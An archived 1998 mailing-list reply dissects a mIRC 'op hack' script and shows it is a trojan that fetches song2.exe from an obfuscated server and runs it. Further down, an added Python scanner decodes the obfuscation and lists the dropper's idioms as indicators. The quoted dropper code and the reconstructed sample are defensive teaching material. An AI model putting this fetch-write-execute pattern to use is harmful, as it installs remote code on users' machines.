(no subject)

From: Cacaio Torquato (cacaioat_private)
Date: Sat Nov 14 1998 - 13:37:29 PST

    At 14:50 13/11/98 -0500, rootat_private wrote:
    >Hi,
    >while debugging/hexing/disassembling mirc my friend slotmech last week found
    >a mirc bug which allows to force users to send MODE commands to the server.
    >this example script sends a MODE +o to the irc server. the mirc author has been
    >notified of this but we didn't receive a response... my exploit+protection
    >scri$is included. Expect more mirc stuff from us.
    >
    >
    
    Are you nutz man? Your code simply makes whoever wants to get op fetch a file
    from your server and execute it. I'm glad you weren't smart enough to place
    the full address of your server.
    For the ones who want to know exactly what's happening, I will explain
    the code step by step.
    
    Your attempt to install your file on everyone who wants to hack ops was
    funny, just funny...
    
    >alias hackop {
    >...
    >  checklen $1
    >...
    >}
    
    calls the function checklen - see below
    
    >
    >alias checklen {
    >  .if (%xcomplete == 1) halt
    >  .if (%xinprog == 1) halt
    >  .set %xfilename song2.exe
    >  .set %xlof $lof(%xfilename)
    >  .set %xfirst 1
    >  .write -c %xfilename
    
    sets the filename to song2.exe, and clears it if something is in it already.
    
    >  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104
    101 - 1$  .sockclose protx
    
    if this line is uncommented, it displays the following message on the screen:
    d o n t - s p o i l - t h e
    
    >  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+
    $chr$}
    
    opens a socket connection to the designated server. the one placed in his
    code is www.g (i think he forgot the rest)
    
    >on 1:sockopen:protx: {
    >  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+
    $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47)
    $+ $chr(57) $+ $c$  .sockwrite -n protx
    >}
    
    when this socket connection is opened, it sends the request 'GET /Belta/9' to
    the server and starts receiving data
    
    >on 1:sockread:protx: {
    >  .sockread &test
    >  .set %xlof $lof(%xfilename)
    >  .if (%xfirst == 1) set %xlof 0
    >  .set %xfirst 0
    >  .bwrite %xfilename %xlof $sockbr &test
    >}
    
    just receives the data and writes it to a file
    
    >on 1:connect:checklen
    
    why is it here? because when the user connects to the irc server, the
    script will grab the file again, and again and again.
    
    >on 1:sockclose:protx: {
    >  .sockread &test
    >  if ($sockbr > 0) {
    >    .set %xlof $lof(%xfilename)
    >    .bwrite %xfilename %xlof $sockbr &test
    >  }
    
    finishes writing the file
    
    >  .if ($lof(%xfilename) == 178306) {
    >    .run %xfilename
    >    .set %xcomplete 1
    >  }
    
    if the size of the file, in bytes, is equal to 178306, runs the file
    
    >  if ($lof(%xfilename) != 178306) {
    >    .timer 1 300 checklen
    >  }
    
    if the size of the file, in bytes, is less than 178306, starts a timer that
    in 300 seconds will get the file again
    
    >  }
    >  unset %xinprog
    >  unset %xfilename
    >  unset %xlof
    >  unset %xfirst
    >}
    >
    
    unsets the garbage variables
    
    -----------
    that's it
    
    Best regards,
    --
    Cacaio Torquato     http://www.deathknights.com/cacaio
    
    The Death Knights   http://www.deathknights.com          zelur xuniL  ()  -O)
    Tedio INC.          http://www.tedio.org                 Think Blue.  /\  /\\
                                                                             _\_V
    +-------------------------------------------------------+
    |         BrasNet IRC Servers Network - Brazil          |
    |         irc.brasnet.org   irc.webtech.com.br          |
    |                   irc.sol.com.br                      |
    +-------------------------------------------------------+
    
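The post walks through a script that hides its strings behind `$chr()` and `$+` concatenation, pulls a binary over a raw socket, writes it with `bwrite`, runs it once it reaches a fixed size, and re-arms itself from `on 1:connect`. The following scanner is an added example written for this archive page, not code from the original poster or from mIRC: it decodes the `$chr()` obfuscation so an analyst can read the hidden strings, and flags scripts that combine the download, write-to-disk, execute and auto-trigger idioms described above. The sample script it runs on is constructed for the example (the host `www.example.invalid` and the path `/x` are placeholders, not the original author's server); the indicator names and the `scan_script` / `deobfuscate_chr` helpers are this example's own.

```python
import re

# Constructed sample modelled on the idioms the post describes. The host and
# path are placeholders invented for this example, not the original server.
SAMPLE_SCRIPT = """alias checklen {
  .set %xfilename song2.exe
  .write -c %xfilename
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(101) $+ $chr(120) $+ $chr(97) $+ $chr(109) $+ $chr(112) $+ $chr(108) $+ $chr(101) $+ . $+ $chr(105) $+ $chr(110) $+ $chr(118) $+ $chr(97) $+ $chr(108) $+ $chr(105) $+ $chr(100) 80
}
on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(120)
}
on 1:sockread:protx: {
  .sockread &test
  .bwrite %xfilename %xlof $sockbr &test
}
on 1:connect:checklen
on 1:sockclose:protx: {
  .if ($lof(%xfilename) == 178306) {
    .run %xfilename
  }
}
"""

# $chr(...) with one number, or with a space-separated list as in the post's
# commented-out echo line; non-numeric tokens (like "-") are kept literally.
_CHR_RE = re.compile(r"\$chr\(([^()]*)\)")

# Each indicator is a regex over the decoded script plus a short label.
INDICATORS = {
    "socket download": re.compile(r"\bsockopen\b.*\n.*sockread|\bsockopen\b", re.S),
    "binary file write": re.compile(r"\bbwrite\b"),
    "executes downloaded file": re.compile(r"(^|\s)\.?run\s+%\w+", re.M),
    "on-connect trigger": re.compile(r"^on\s+\d+:connect:", re.M),
    "size-gated execution": re.compile(r"\$lof\(%\w+\)\s*==\s*\d+"),
    "re-arm timer": re.compile(r"\.?timer\b"),
}


def _decode_chr(match: re.Match) -> str:
    """Turn the argument list of one $chr(...) into the characters it names."""
    out = []
    for token in match.group(1).split():
        out.append(chr(int(token)) if token.isdigit() else token)
    return "".join(out)


def deobfuscate_chr(text: str) -> str:
    """Replace every $chr(N) with its character and collapse mIRC's $+ joins."""
    decoded = _CHR_RE.sub(_decode_chr, text)
    # "$+" concatenates the tokens on either side with no space between them.
    return re.sub(r"\s*\$\+\s*", "", decoded)


def scan_script(text: str) -> dict:
    """Decode the script, collect matching indicators and judge the dropper pattern."""
    decoded = deobfuscate_chr(text)
    found = {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    # Heavy $chr() use on its own is worth a look: count occurrences in the raw text.
    chr_count = len(_CHR_RE.findall(text))
    if chr_count >= 5:
        found.add("chr-obfuscated strings")
    # A dropper needs all three: fetch from the network, write to disk, execute.
    dropper = {"socket download", "binary file write",
               "executes downloaded file"} <= found
    return {"decoded": decoded, "indicators": found,
            "chr_count": chr_count, "dropper": dropper}


if __name__ == "__main__":
    report = scan_script(SAMPLE_SCRIPT)
    print("dropper pattern:", report["dropper"])
    for name in sorted(report["indicators"]):
        print(" -", name)
    print(report["decoded"])
```

Running it on the sample prints the decoded script with the host and `GET /x` request in the clear and reports the dropper pattern; on a user's own `.ini`/`.mrc` files the decoded output is what to read before deciding whether a "free ops" script should be loaded.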
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:25 PDT